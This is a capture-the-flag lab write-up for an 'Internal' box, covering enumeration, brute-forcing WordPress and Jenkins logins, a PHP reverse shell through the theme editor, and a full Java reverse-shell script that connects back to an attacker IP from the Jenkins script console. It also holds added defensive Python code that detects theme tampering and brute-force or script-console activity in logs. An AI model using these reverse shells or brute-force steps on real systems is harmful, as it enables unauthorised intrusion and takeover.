HTB Internal

Internal

Difficulty: High
Score: 8.5/10


Target

  1. 2 flags
  2. root privilege
  3. docker escalation

Process

Enumeration

Nmap scan output

# Nmap 7.92 scan initiated Wed Jan 26 00:57:36 2022 as: nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.197.139 10.10.197.139
Nmap scan report for 10.10.197.139
Host is up (0.24s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 26 00:58:07 2022 -- 1 IP address (1 host up) scanned in 31.03 seconds

Replacing the hostname in the website elements

We check out port 80; the page doesn't load properly.

Inspecting the page elements, we find something interesting:

All of the resources load from internal.thm, which our local machine can't resolve. We can use Burp Suite to match the hostname and replace it with the IP address, or simply add a hosts entry:

vim /etc/hosts
add the line below:
10.10.19.247 internal.thm

Now the site loads normally. It is a WordPress application; the default login path is /wp-login.php.


We can log in by brute force. I used the Burp Suite Intruder module; the password is my2boys.

Get shell

After logging in, we can modify the theme code to add malicious code (a reverse shell) to it.


We get a connection back from the php-reverse-shell code.
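From the defender's side, the theme-editor step above is detectable: a theme's files should not change outside of an update. Below is an added example written for this page (not code from the original writeup, WordPress or any tool it mentions) that takes a SHA-256 baseline of a theme directory, reports files added or modified since, and checks the changed ones for PHP calls that rarely belong in a template. The theme contents and the tampered 404.php are constructed inline; the hashing and pattern logic is the general technique, not tied to this box.

```python
import hashlib
import os
import re
import tempfile

# PHP calls that rarely belong in a theme template; a hit on a changed file deserves review.
SUSPICIOUS_PHP = re.compile(
    r"\b(fsockopen|proc_open|shell_exec|passthru|popen|exec|system|eval|base64_decode)\s*\(",
    re.IGNORECASE,
)


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large assets do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def diff_manifest(baseline, current):
    """Compare two manifests; returns sorted lists of added, removed and modified paths."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def suspicious_calls(path):
    """Distinct suspicious PHP function names called in the file, lower-cased and sorted."""
    with open(path, "r", errors="replace") as fh:
        return sorted({m.group(1).lower() for m in SUSPICIOUS_PHP.finditer(fh.read())})


def audit_theme(root, baseline):
    """Return (diff, flagged); flagged maps each added/modified file to its suspicious calls."""
    diff = diff_manifest(baseline, build_manifest(root))
    flagged = {}
    for rel in diff["added"] + diff["modified"]:
        calls = suspicious_calls(os.path.join(root, rel))
        if calls:
            flagged[rel] = calls
    return diff, flagged


def make_demo_theme():
    """Constructed sample: a tiny clean theme, its baseline, then a tampered 404.php."""
    root = tempfile.mkdtemp(prefix="theme-")
    clean = {
        "style.css": "/* Theme Name: Demo */\n",
        "index.php": "<?php get_header(); ?>\n",
        "404.php": "<?php get_header(); echo 'Not found'; get_footer(); ?>\n",
    }
    for rel, body in clean.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    baseline = build_manifest(root)
    # Simulated tampering (a constructed indicator, not working code): a template
    # that opens an outbound socket and evaluates an encoded blob.
    with open(os.path.join(root, "404.php"), "w") as fh:
        fh.write("<?php $h = fsockopen('203.0.113.10', 4444); eval(base64_decode('PLACEHOLDER')); ?>\n")
    return root, baseline


if __name__ == "__main__":
    theme_root, theme_baseline = make_demo_theme()
    diff, flagged = audit_theme(theme_root, theme_baseline)
    for kind in ("added", "removed", "modified"):
        for rel in diff[kind]:
            print(f"{kind:9s} {rel}")
    for rel, calls in flagged.items():
        print(f"SUSPICIOUS {rel}: {', '.join(calls)}")
```

In practice the baseline is taken right after installing or updating a theme and stored off-host, so an attacker with dashboard access cannot rewrite it. Setting define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the dashboard theme and plugin editor altogether, which closes the path this writeup used.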

Information collection

cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Log in as aubreanna via SSH

Pay attention to the IP address of docker0; we have to pivot into the internal network.


We can make an SSH tunnel to reach the internal network.

Now we can access http://localhost:8081.

We use Burp Suite to brute-force the password; it is spongebob.

We can execute a script via the script console (a Java reverse shell):

String host = "10.11.61.17";
int port = 4446;
String cmd = "/bin/sh";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
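Two steps in this chain leave the same kind of trace in an HTTP access log: the Intruder run against /wp-login.php earlier, and the POST to the Jenkins script console here. The script below is an added example for this page (not from the original writeup, and not a tool shipped with WordPress or Jenkins). It parses lines in the Apache combined format, flags any source IP with a burst of POSTs to /wp-login.php (WordPress re-renders the form with a 200 on a failed login and answers a successful one with a 302 redirect, so a 302 closing the burst suggests a guess landed), and lists every POST to /script or /scriptText, each of which is a Groovy execution with the privileges of the Jenkins process, root in this box. The log lines are constructed inline with documentation-range addresses; Jenkins only writes such a log if its access logger is enabled, which is assumed here.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/NCSA "combined" log format; Jenkins' Winstone access logger can emit the same shape.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Jenkins script console endpoints; endswith() also catches /computer/<node>/script.
SCRIPT_CONSOLE_SUFFIXES = ("/script", "/scriptText")


def parse_log(text):
    """Parse combined-format lines into event dicts; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append({
            "ip": m["ip"],
            "user": m["user"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"].split("?", 1)[0],
            "status": int(m["status"]),
        })
    return events


def detect_wp_bruteforce(events, threshold=10, window_s=60):
    """Flag IPs with >= threshold POSTs to /wp-login.php inside any window_s-second window.
    A 302 on the POST that completes the burst marks a likely successful login."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and ev["path"] == "/wp-login.php":
            by_ip[ev["ip"]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits within window_s of evs[end].
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                f = findings.setdefault(ip, {"posts": 0, "succeeded": False})
                f["posts"] = max(f["posts"], count)
                if evs[end]["status"] == 302:
                    f["succeeded"] = True
    return findings


def detect_script_console(events):
    """Return (ip, user, iso timestamp, path) for every POST to a Jenkins script console."""
    return [
        (ev["ip"], ev["user"], ev["ts"].isoformat(), ev["path"])
        for ev in events
        if ev["method"] == "POST" and ev["path"].rstrip("/").endswith(SCRIPT_CONSOLE_SUFFIXES)
    ]


def build_sample_log():
    """Constructed log lines (documentation-range IPs), not taken from the writeup's target."""
    line = '{ip} - {user} [26/Jan/2022:{t} +0000] "{m} {p} HTTP/1.1" {st} 512 "-" "Mozilla/5.0"'
    # Twelve failed guesses in twelve seconds, then the redirect of a successful login.
    lines = [line.format(ip="203.0.113.10", user="-", t=f"01:10:{i:02d}", m="POST",
                         p="/wp-login.php", st=200) for i in range(12)]
    lines.append(line.format(ip="203.0.113.10", user="-", t="01:10:12", m="POST",
                             p="/wp-login.php", st=302))
    # A normal user: one typo, then a successful login; stays under the threshold.
    lines.append(line.format(ip="198.51.100.7", user="-", t="01:11:00", m="POST",
                             p="/wp-login.php", st=200))
    lines.append(line.format(ip="198.51.100.7", user="-", t="01:11:05", m="POST",
                             p="/wp-login.php", st=302))
    # Jenkins: a script console execution followed by an ordinary page view.
    lines.append(line.format(ip="172.17.0.1", user="admin", t="01:20:00", m="POST",
                             p="/script", st=200))
    lines.append(line.format(ip="172.17.0.1", user="admin", t="01:20:30", m="GET",
                             p="/job/test/", st=200))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    evs = parse_log(build_sample_log())
    for ip, f in detect_wp_bruteforce(evs).items():
        print(f"wp-login burst from {ip}: {f['posts']} POSTs, success={f['succeeded']}")
    for ip, user, when, path in detect_script_console(evs):
        print(f"script console POST {path} by {user} from {ip} at {when}")
```

The threshold and window are starting points; a login endpoint that sees 10 POSTs from one address in a minute is either a brute-force run or a broken client, and either is worth a rate limit. For Jenkins, every script console POST should map to a named administrator and a change ticket, and the Jenkins process should not run as root in the first place, which is what turned this console into a root shell.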

Log in as root


Summary